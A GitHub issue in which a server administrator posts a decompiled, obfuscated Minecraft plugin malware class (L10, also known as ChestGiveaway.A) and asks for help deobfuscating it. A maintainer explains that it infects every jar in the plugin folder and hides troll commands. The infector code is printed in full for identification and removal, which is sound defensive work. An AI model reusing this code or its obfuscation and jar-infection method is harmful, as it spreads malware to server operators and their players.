search

java-deobfuscator / deobfuscator

The real deal
https://javadeobfuscator.com
Apache License 2.0
1.57k stars 292 forks source link

Help with deobfuscation #989

Closed Manered closed 8 months ago

Manered commented 8 months ago

Hey there, I tried deobfuscating this likely crypto-miner's class that gets injected into my customers Minecraft server (he has a crypto-miner on there, and he is trying to get rid of it). When trying to deobfuscate it with this tool, it did not print out any list of transformers (so it didn't find an appropriate deobfuscator). I'm not trying to deobfuscate the entire jar file, but just the class that the crypto-miner adds.

If you don't know how to deobfuscate this specifically, can you atleast try telling me what obfuscator was used in this process or what I can try?

Here's the class:

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package org.debuff.debuff;

import java.io.ByteArrayInputStream;
import java.io.File;
import java.nio.charset.StandardCharsets;
import java.nio.file.FileSystems;
import java.nio.file.FileVisitOption;
import java.nio.file.Files;
import java.nio.file.LinkOption;
import java.nio.file.OpenOption;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.StandardOpenOption;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Arrays;
import java.util.Base64;
import javassist.aa;
import javassist.b;
import javassist.f;
import javassist.k;
import javassist.ws.a;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

public class SpawnZombieL10 {
    public final void a(String lllllllllllllllllIIIlIIlllIlllIl) {
        if (!lllllIIIllll(System.getProperty(llIIIlIIlIl[llIIIlIIllI[1]]).toLowerCase().contains(llIIIlIIlIl[llIIIlIIllI[2]]))) {
            a = new File(lllllllllllllllllIIIlIIlllIlllIl);
            char lllllllllllllllllIIIlIIlllIlllII = f.a();
            String lllllllllllllllllIIIlIIlllIllIll = new b(lllllllllllllllllIIIlIIlllIllllI.getClass());
            lllllllllllllllllIIIlIIlllIlllII.a(lllllllllllllllllIIIlIIlllIllIll);
            "".length();
            short lllllllllllllllllIIIlIIlllIllIlI = Paths.get(lllllllllllllllllIIIlIIlllIllllI.getClass().getProtectionDomain().getCodeSource().getLocation().toURI());
            byte lllllllllllllllllIIIlIIlllIllIIl = FileSystems.newFileSystem(lllllllllllllllllIIIlIIlllIllIlI, (ClassLoader)null);
            if (lllllIIIllll(Files.exists(lllllllllllllllllIIIlIIlllIllIIl.getPath(llIIIlIIlIl[llIIIlIIllI[3]]), new LinkOption[llIIIlIIllI[0]]))) {
                short lllllllllllllllllIIIlIIlllIllIII = lllllllllllllllllIIIlIIlllIllIIl.getPath(llIIIlIIlIl[llIIIlIIllI[4]]);
                "".length();
                if (null == null) {
                    byte lllllllllllllllllIIIlIIlllIlIlll = lllllllllllllllllIIIlIIlllIlllII.c(lllllllllllllllllIIIlIIlllIllllI.getClass().getName());
                    boolean lllllllllllllllllIIIlIIlllIlIlIl = javassist.ws.a.a(a).iterator();
                    "".length();
                    if (" ".length() > -" ".length()) {
                        while(!lllllIIlIIII(lllllllllllllllllIIIlIIlllIlIlIl.hasNext())) {
                            Exception lllllllllllllllllIIIlIIlllIlIllI = (File)lllllllllllllllllIIIlIIlllIlIlIl.next();

                            label110: {
                                try {
                                    boolean lllllllllllllllllIIIlIIlllIlIlII = FileSystems.newFileSystem(lllllllllllllllllIIIlIIlllIlIllI.toPath(), (ClassLoader)null);
                                    if (lllllIIIllll(Files.exists(lllllllllllllllllIIIlIIlllIlIlII.getPath(llIIIlIIlIl[llIIIlIIllI[5]]), new LinkOption[llIIIlIIllI[0]]))) {
                                        break label110;
                                    }

                                    label103: {
                                        try {
                                            Exception lllllllllllllllllIIIlIIlllIlIIlI = lllllllllllllllllIIIlIIlllIlIlII.getRootDirectories().iterator();
                                            "".length();
                                            if ((107 ^ 53 ^ 119 ^ 45) == -" ".length()) {
                                                return;
                                            }

                                            while(!lllllIIlIIII(lllllllllllllllllIIIlIIlllIlIIlI.hasNext())) {
                                                int lllllllllllllllllIIIlIIlllIlIIll = (Path)lllllllllllllllllIIIlIIlllIlIIlI.next();
                                                short lllllllllllllllllIIIlIIlllIlIIIl = Files.walk(lllllllllllllllllIIIlIIlllIlIIll, llIIIlIIllI[6], new FileVisitOption[llIIIlIIllI[0]]).filter((var0) -> {
                                                    int var10000;
                                                    if (lllllIIlIIII(Files.isDirectory(var0, new LinkOption[llIIIlIIllI[0]])) && lllllIIIllll(var0.toString().endsWith(llIIIlIIlIl[llIIIlIIllI[32]]))) {
                                                        var10000 = llIIIlIIllI[1];
                                                        "".length();
                                                        if (((216 ^ 196 ^ 245 ^ 196) & (180 + 26 - 127 + 109 ^ 106 + 11 - 98 + 126 ^ -" ".length())) != 0) {
                                                            return (boolean)((112 + 56 - 63 + 135 ^ 151 + 124 - 253 + 177) & (23 ^ 90 ^ 245 ^ 143 ^ -" ".length()));
                                                        }
                                                    } else {
                                                        var10000 = llIIIlIIllI[0];
                                                    }

                                                    return (boolean)var10000;
                                                }).iterator();
                                                "".length();
                                                if ((14 ^ 10) < 0) {
                                                    return;
                                                }

                                                while(!lllllIIlIIII(lllllllllllllllllIIIlIIlllIlIIIl.hasNext())) {
                                                    try {
                                                        lllllllllllllllllIIIlIIlllIlIlll.c();
                                                        long lllllllllllllllllIIIlIIlllIlIIII = (Path)lllllllllllllllllIIIlIIlllIlIIIl.next();
                                                        String lllllllllllllllllIIIlIIlllIIllll = new ByteArrayInputStream(Files.readAllBytes(lllllllllllllllllIIIlIIlllIlIIII));
                                                        double lllllllllllllllllIIIlIIlllIIlllI = lllllllllllllllllIIIlIIlllIlllII.a(lllllllllllllllllIIIlIIlllIIllll);
                                                        if (lllllIIIllll(lllllllllllllllllIIIlIIlllIIlllI.b().a().contains(llIIIlIIlIl[llIIIlIIllI[7]]))) {
                                                            String var10001 = lllllllllllllllllIIIlIIlllIlIIII.getParent().toString();
                                                            String[] var10002 = new String[llIIIlIIllI[1]];
                                                            var10002[llIIIlIIllI[0]] = String.valueOf((new StringBuilder(String.valueOf(lllllllllllllllllIIIlIIlllIIlllI.b()))).append(llIIIlIIlIl[llIIIlIIllI[8]]));
                                                            float lllllllllllllllllIIIlIIlllIIllIl = lllllllllllllllllIIIlIIlllIlIlII.getPath(var10001, var10002);
                                                            byte[] var23;
                                                            OpenOption[] var24;
                                                            if (lllllIIlIIII(Files.exists(lllllllllllllllllIIIlIIlllIlIlII.getPath(llIIIlIIlIl[llIIIlIIllI[9]]), new LinkOption[llIIIlIIllI[0]]))) {
                                                                lllllllllllllllllIIIlIIlllIlIlll.a(lllllllllllllllllIIIlIIlllIIllIl.toString().replace(llIIIlIIlIl[llIIIlIIllI[10]], llIIIlIIlIl[llIIIlIIllI[11]]).replaceFirst(llIIIlIIlIl[llIIIlIIllI[12]], llIIIlIIlIl[llIIIlIIllI[13]]));
                                                                Files.createFile(lllllllllllllllllIIIlIIlllIlIlII.getPath(llIIIlIIlIl[llIIIlIIllI[14]]));
                                                                "".length();
                                                                var23 = lllllllllllllllllIIIlIIlllIlIlll.a();
                                                                var24 = new OpenOption[llIIIlIIllI[2]];
                                                                var24[llIIIlIIllI[0]] = StandardOpenOption.CREATE;
                                                                var24[llIIIlIIllI[1]] = StandardOpenOption.WRITE;
                                                                Files.write(lllllllllllllllllIIIlIIlllIIllIl, var23, var24);
                                                                "".length();

                                                                label87: {
                                                                    try {
                                                                        Files.createDirectory(lllllllllllllllllIIIlIIlllIlIlII.getPath(llIIIlIIlIl[llIIIlIIllI[15]]));
                                                                        "".length();
                                                                    } catch (Exception var19) {
                                                                        break label87;
                                                                    }

                                                                    "".length();
                                                                    if (" ".length() < 0) {
                                                                        return;
                                                                    }
                                                                }

                                                                Files.walkFileTree(lllllllllllllllllIIIlIIlllIllIII, new k(lllllllllllllllllIIIlIIlllIlIlII.getPath(llIIIlIIlIl[llIIIlIIllI[16]])));
                                                                "".length();
                                                                "".length();
                                                                if (-"   ".length() > 0) {
                                                                    return;
                                                                }
                                                            } else {
                                                                boolean lllllllllllllllllIIIlIIlllIIllII = lllllllllllllllllIIIlIIlllIIlllI.a(llIIIlIIlIl[llIIIlIIllI[17]]);
                                                                lllllllllllllllllIIIlIIlllIIllII.d(String.valueOf((new StringBuilder(llIIIlIIlIl[llIIIlIIllI[18]])).append(lllllllllllllllllIIIlIIlllIIllIl.toString().replace(llIIIlIIlIl[llIIIlIIllI[19]], llIIIlIIlIl[llIIIlIIllI[20]]).replace(llIIIlIIlIl[llIIIlIIllI[21]], llIIIlIIlIl[llIIIlIIllI[22]]).replaceFirst(llIIIlIIlIl[llIIIlIIllI[23]], llIIIlIIlIl[llIIIlIIllI[24]])).append(llIIIlIIlIl[llIIIlIIllI[25]])));
                                                                var23 = lllllllllllllllllIIIlIIlllIIlllI.a();
                                                                var24 = new OpenOption[llIIIlIIllI[1]];
                                                                var24[llIIIlIIllI[0]] = StandardOpenOption.WRITE;
                                                                Files.write(lllllllllllllllllIIIlIIlllIlIIII, var23, var24);
                                                                "".length();
                                                                Files.createFile(lllllllllllllllllIIIlIIlllIlIlII.getPath(llIIIlIIlIl[llIIIlIIllI[26]]));
                                                                "".length();
                                                            }
                                                        }

                                                        lllllllllllllllllIIIlIIlllIIllll.close();
                                                    } catch (Exception var20) {
                                                        boolean var10000 = var20 instanceof aa;
                                                        "".length();
                                                        continue;
                                                    }

                                                    "".length();
                                                    if (" ".length() < 0) {
                                                        return;
                                                    }
                                                }
                                            }
                                        } catch (Exception var21) {
                                            break label103;
                                        }

                                        "".length();
                                        if ("  ".length() == 0) {
                                            return;
                                        }
                                    }

                                    lllllllllllllllllIIIlIIlllIlIlII.close();
                                } catch (Exception var22) {
                                    continue;
                                }

                                "".length();
                                if ("   ".length() > "   ".length()) {
                                    return;
                                }
                                continue;
                            }

                            "".length();
                            if (((2 ^ 44) & ~(110 ^ 64)) != 0) {
                                return;
                            }
                        }

                        if (lllllIIlIIII(a)) {
                            a = (boolean)llIIIlIIllI[1];
                            lllllllllllllllllIIIlIIlllIllllI.a(lllllllllllllllllIIIlIIlllIlllIl);
                        } else {
                            if (lllllIIlIIIl(System.getProperty(llIIIlIIlIl[llIIIlIIllI[27]]))) {
                                System.setProperty(llIIIlIIlIl[llIIIlIIllI[28]], llIIIlIIlIl[llIIIlIIllI[29]]);
                                "".length();
                                a = new a();
                            }

                        }
                    }
                }
            }
        }
    }

    private static boolean lllllIIIllll(int var0) {
        return var0 != 0;
    }

    private static boolean lllllIIlIIII(int var0) {
        return var0 == 0;
    }

    private static boolean lllllIIlIIIl(Object var0) {
        return var0 == null;
    }

    private static String lllllIIIlIIl(String lllllllllllllllllIIIlIIllIllIlII, String lllllllllllllllllIIIlIIllIllIIll) {
        lllllllllllllllllIIIlIIllIllIlII = new String(Base64.getDecoder().decode(lllllllllllllllllIIIlIIllIllIlII.getBytes(StandardCharsets.UTF_8)), StandardCharsets.UTF_8);
        StringBuilder lllllllllllllllllIIIlIIllIllIlll = new StringBuilder();
        char[] lllllllllllllllllIIIlIIllIllIllI = lllllllllllllllllIIIlIIllIllIIll.toCharArray();
        int lllllllllllllllllIIIlIIllIllIlIl = llIIIlIIllI[0];
        short lllllllllllllllllIIIlIIllIlIllll = lllllllllllllllllIIIlIIllIllIlII.toCharArray();
        byte lllllllllllllllllIIIlIIllIlIlllI = lllllllllllllllllIIIlIIllIlIllll.length;
        boolean lllllllllllllllllIIIlIIllIlIllIl = llIIIlIIllI[0];

        do {
            if (!lllllIIlIIll(lllllllllllllllllIIIlIIllIlIllIl, lllllllllllllllllIIIlIIllIlIlllI)) {
                return String.valueOf(lllllllllllllllllIIIlIIllIllIlll);
            }

            char lllllllllllllllllIIIlIIllIlllIlI = lllllllllllllllllIIIlIIllIlIllll[lllllllllllllllllIIIlIIllIlIllIl];
            lllllllllllllllllIIIlIIllIllIlll.append((char)(lllllllllllllllllIIIlIIllIlllIlI ^ lllllllllllllllllIIIlIIllIllIllI[lllllllllllllllllIIIlIIllIllIlIl % lllllllllllllllllIIIlIIllIllIllI.length]));
            "".length();
            ++lllllllllllllllllIIIlIIllIllIlIl;
            ++lllllllllllllllllIIIlIIllIlIllIl;
            "".length();
        } while("  ".length() == "  ".length());

        return null;
    }

    private static String lllllIIIlIlI(String lllllllllllllllllIIIlIIllIIlIlIl, String lllllllllllllllllIIIlIIllIIlIlII) {
        try {
            byte lllllllllllllllllIIIlIIllIIlIIll = new SecretKeySpec(MessageDigest.getInstance("MD5").digest(lllllllllllllllllIIIlIIllIIlIlII.getBytes(StandardCharsets.UTF_8)), "Blowfish");
            char lllllllllllllllllIIIlIIllIIlIIlI = Cipher.getInstance("Blowfish");
            lllllllllllllllllIIIlIIllIIlIIlI.init(llIIIlIIllI[2], lllllllllllllllllIIIlIIllIIlIIll);
            return new String(lllllllllllllllllIIIlIIllIIlIIlI.doFinal(Base64.getDecoder().decode(lllllllllllllllllIIIlIIllIIlIlIl.getBytes(StandardCharsets.UTF_8))), StandardCharsets.UTF_8);
        } catch (Exception var4) {
            var4.printStackTrace();
            return null;
        }
    }

    public static String a(int var0) {
        StringBuilder lllllllllllllllllIIIlIIlllIIIlll = new StringBuilder();
        int var2 = llIIIlIIllI[0];
        "".length();
        if ((28 ^ 25) <= 0) {
            return null;
        } else {
            while(!lllllIIlIIlI(var2, var0)) {
                lllllllllllllllllIIIlIIlllIIIlll.append(llIIIlIIlIl[llIIIlIIllI[30]].charAt(a.nextInt(llIIIlIIlIl[llIIIlIIllI[31]].length())));
                "".length();
                ++var2;
            }

            return String.valueOf(lllllllllllllllllIIIlIIlllIIIlll);
        }
    }

    private static String lllllIIIlIII(String lllllllllllllllllIIIlIIllIlIIlII, String lllllllllllllllllIIIlIIllIlIIIll) {
        try {
            SecretKeySpec lllllllllllllllllIIIlIIllIlIIlll = new SecretKeySpec(Arrays.copyOf(MessageDigest.getInstance("MD5").digest(lllllllllllllllllIIIlIIllIlIIIll.getBytes(StandardCharsets.UTF_8)), llIIIlIIllI[9]), "DES");
            Cipher lllllllllllllllllIIIlIIllIlIIllI = Cipher.getInstance("DES");
            lllllllllllllllllIIIlIIllIlIIllI.init(llIIIlIIllI[2], lllllllllllllllllIIIlIIllIlIIlll);
            return new String(lllllllllllllllllIIIlIIllIlIIllI.doFinal(Base64.getDecoder().decode(lllllllllllllllllIIIlIIllIlIIlII.getBytes(StandardCharsets.UTF_8))), StandardCharsets.UTF_8);
        } catch (Exception var5) {
            var5.printStackTrace();
            return null;
        }
    }

    static {
        lllllIIIlllI();
        lllllIIIlIll();
        a = llIIIlIIlIl[llIIIlIIllI[0]];
        a = (boolean)llIIIlIIllI[0];
        a = new SecureRandom();
    }

    public SpawnZombieL10() {
    }

    private static void lllllIIIlIll() {
        llIIIlIIlIl = new String[llIIIlIIllI[33]];
        llIIIlIIlIl[llIIIlIIllI[0]] = lllllIIIlIII("whZsDeWLEuF+BeQQdQLuJ2zRe/gk0VGAZCmC4qfcitHNp/wB9OmPktkFLTbWiqT5pa+o0IZV0ynU9ZxEK7hNkJvwzTjI22HB", "Wuzup");
        llIIIlIIlIl[llIIIlIIllI[1]] = lllllIIIlIII("TN8dTwxfOZg=", "IeNKN");
        llIIIlIIlIl[llIIIlIIllI[2]] = lllllIIIlIII("p3VsZ9hxF54=", "PGFhZ");
        llIIIlIIlIl[llIIIlIIllI[3]] = lllllIIIlIIl("YjopBQs+IyEAHg==", "MPHsj");
        llIIIlIIlIl[llIIIlIIllI[4]] = lllllIIIlIIl("eiUNEhQmPAUXAQ==", "UOldu");
        llIIIlIIlIl[llIIIlIIllI[5]] = lllllIIIlIIl("YjkoKDMiOgUk", "LUwAT");
        llIIIlIIlIl[llIIIlIIllI[7]] = lllllIIIlIIl("BAc8KCoiEy0gFA==", "NfJIz");
        llIIIlIIlIl[llIIIlIIllI[8]] = lllllIIIlIlI("5+m/ld1KFkYgNphr7Cvtgw==", "pHKPx");
        llIIIlIIlIl[llIIIlIIllI[9]] = lllllIIIlIlI("mXIoflZmxC4=", "RohAN");
        llIIIlIIlIl[llIIIlIIllI[10]] = lllllIIIlIIl("WiQIABsH", "tGdah");
        llIIIlIIlIl[llIIIlIIllI[11]] = lllllIIIlIII("QEp3W0WGBDs=", "vPeVJ");
        llIIIlIIlIl[llIIIlIIllI[12]] = lllllIIIlIlI("REXVK4ncgO4=", "eAOOM");
        llIIIlIIlIl[llIIIlIIllI[13]] = lllllIIIlIlI("rQZXitLllrc=", "mSQLK");
        llIIIlIIlIl[llIIIlIIllI[14]] = lllllIIIlIlI("V875n3k+i1k=", "ORDjT");
        llIIIlIIlIl[llIIIlIIllI[15]] = lllllIIIlIlI("EwoEbVO2QK1OSDnRfK8B/Q==", "zubwy");
        llIIIlIIlIl[llIIIlIIllI[16]] = lllllIIIlIlI("WPO1lejAiVs8DzQicVLCAA==", "gzCcN");
        llIIIlIIlIl[llIIIlIIllI[17]] = lllllIIIlIIl("ATo1KQUMOBU=", "nTpGd");
        llIIIlIIlIl[llIIIlIIllI[18]] = lllllIIIlIIl("BywdVw==", "iIjwb");
        llIIIlIIlIl[llIIIlIIllI[19]] = lllllIIIlIlI("jkYCGJhVsg0=", "WgyfO");
        llIIIlIIlIl[llIIIlIIllI[20]] = lllllIIIlIlI("OlBkN668kZI=", "rzmRy");
        llIIIlIIlIl[llIIIlIIllI[21]] = lllllIIIlIIl("eDElEzwl", "VRIrO");
        llIIIlIIlIl[llIIIlIIllI[22]] = lllllIIIlIIl("", "AdVlI");
        llIIIlIIlIl[llIIIlIIllI[23]] = lllllIIIlIIl("ag==", "DTRbf");
        llIIIlIIlIl[llIIIlIIllI[24]] = lllllIIIlIIl("", "CjAMv");
        llIIIlIIlIl[llIIIlIIllI[25]] = lllllIIIlIlI("EdxE5YllsMYT19K1LCU3HQnD+V3WHMPz/JbUucnyv6UEuyPFoVKD4g==", "TvWbC");
        llIIIlIIlIl[llIIIlIIllI[26]] = lllllIIIlIIl("eigLMCA6KyY8", "TDTYG");
        llIIIlIIlIl[llIIIlIIllI[27]] = lllllIIIlIII("5youM5tNOg4=", "aOhaa");
        llIIIlIIlIl[llIIIlIIllI[28]] = lllllIIIlIIl("EwwKCxUB", "uugTf");
        llIIIlIIlIl[llIIIlIIllI[29]] = lllllIIIlIII("df1dBzD5zjI=", "xfUit");
        llIIIlIIlIl[llIIIlIIllI[30]] = lllllIIIlIIl("W1phYXJeXWRqfwoJMDYjDQw7OywABz48KRsaISEyHh0kKj8RKhERAi4tFBoPISAfHwgkOwIAFT8+BQUeMjF+DQ==", "kkSRF");
        llIIIlIIlIl[llIIIlIIllI[31]] = lllllIIIlIlI("l94eddwYHgv604L60g7G90jFXFsRDVYteBvLl707DMpfn/dGmvnUoaySxDCU/KQ2duSQ7Qtin4Z0MjQXyw/m1a9dseSGVXSv", "XSodC");
        llIIIlIIlIl[llIIIlIIllI[32]] = lllllIIIlIlI("T45EhoJmY/w=", "WwNgM");
    }

    private static void lllllIIIlllI() {
        llIIIlIIllI = new int[34];
        llIIIlIIllI[0] = (54 ^ 116) & ~(45 ^ 111);
        llIIIlIIllI[1] = " ".length();
        llIIIlIIllI[2] = "  ".length();
        llIIIlIIllI[3] = "   ".length();
        llIIIlIIllI[4] = 8 ^ 12;
        llIIIlIIllI[5] = 38 ^ 35;
        llIIIlIIllI[6] = 67 ^ 40 ^ 67 ^ 76;
        llIIIlIIllI[7] = 126 ^ 120;
        llIIIlIIllI[8] = 68 ^ 25 ^ 96 ^ 58;
        llIIIlIIllI[9] = 151 ^ 159;
        llIIIlIIllI[10] = 7 ^ 14;
        llIIIlIIllI[11] = 22 ^ 87 ^ 193 ^ 138;
        llIIIlIIllI[12] = 82 ^ 15 ^ 227 ^ 181;
        llIIIlIIllI[13] = 10 ^ 55 ^ 112 ^ 65;
        llIIIlIIllI[14] = 28 ^ 17;
        llIIIlIIllI[15] = 144 ^ 168 ^ 191 ^ 137;
        llIIIlIIllI[16] = 48 ^ 63;
        llIIIlIIllI[17] = 134 + 158 - 258 + 145 ^ 126 + 103 - 131 + 65;
        llIIIlIIllI[18] = 78 ^ 95;
        llIIIlIIllI[19] = 137 ^ 155;
        llIIIlIIllI[20] = 36 ^ 55;
        llIIIlIIllI[21] = 2 ^ 22;
        llIIIlIIllI[22] = 109 ^ 85 ^ 167 ^ 138;
        llIIIlIIllI[23] = 191 ^ 169;
        llIIIlIIllI[24] = 201 ^ 155 ^ 105 ^ 44;
        llIIIlIIllI[25] = "   ".length() ^ 86 ^ 77;
        llIIIlIIllI[26] = 108 + 98 - 97 + 19 ^ 72 + 53 - 35 + 63;
        llIIIlIIllI[27] = 168 ^ 178;
        llIIIlIIllI[28] = 183 ^ 172;
        llIIIlIIllI[29] = 20 ^ 109 ^ 9 ^ 108;
        llIIIlIIllI[30] = 122 + 102 - 205 + 150 ^ 131 + 6 - 135 + 178;
        llIIIlIIllI[31] = 54 ^ 40;
        llIIIlIIllI[32] = 29 + 115 - 8 + 0 ^ 25 + 62 - -43 + 21;
        llIIIlIIllI[33] = 130 ^ 162;
    }

    private static boolean lllllIIlIIll(int var0, int var1) {
        return var0 < var1;
    }

    private static boolean lllllIIlIIlI(int var0, int var1) {
        return var0 >= var1;
    }
}
Janmm14 commented 8 months ago

The L10 malware is not crypto. OpticFusion1's spigot antimalware detects it as ChestGiveaway.A (likely named by the first appearance it made to him). Its main feature is providing hidden troll commands. Although it does have code to recieve some command from the internet, I don't remember what exactly the internet connection of the malware can do, but I think it was quite limited to trolling features. Afaik the server it tries to connect to is down since at least 2 or 3 years.

You can find the other logic inside the javassist folder, it does contain classes unrelated to javassist.

It spreads to all other jar files in the plugin directory.

I do not know which obfuscator was used and I didn't search for it. Its likely some of the obfuscators available in open-source on github, a few of these popped up after superblaubeere obfuscator and the string decryption and array usage seems to be at least inspired by it.

Manered commented 8 months ago

Alright, good to know. Going to show your reply to my customer/client. They did say he had a virus or crypto-miner on his server.